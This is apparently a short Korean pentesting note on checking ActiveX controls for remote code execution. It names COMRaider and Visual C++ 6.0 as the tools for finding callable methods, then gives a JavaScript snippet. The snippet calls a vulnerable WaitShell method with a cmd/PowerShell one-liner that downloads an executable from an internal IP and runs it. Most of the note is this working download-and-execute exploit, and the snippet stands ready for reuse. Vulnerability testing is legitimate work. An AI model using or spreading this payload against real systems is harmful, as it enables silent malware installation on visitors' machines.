Active X 취약점 점검 방법 (with powershell)

COMRaider / visual C++ 6.0 사용하여 메소드에서 활용 가능한 함수 확인 후 아래 코드를 이용하여 함수 실행

WaitShell 함수에 원격 코드 실행 취약점이 존재하여 powershell 명령어를 활용하여 원격지 파일 다운로드및 실행을 수행하도록 진행함

    <script type="text/javascript">
        try {
            var obj = document.myActiveX;
            if (obj) {
               obj.WaitShell("cmd.exe /c powershell (New-Object System.Net.WebClient).DownloadFile('http://10.4.2.244/dashboard/YlwIISClient.exe','C:\\abc.exe') & C:\\abc.exe","0");

            } else {
                alert("Object is not created!");
            }
        } catch (ex) {
            alert("Some error happens, error message is: " + ex.Description);
        }

    </script>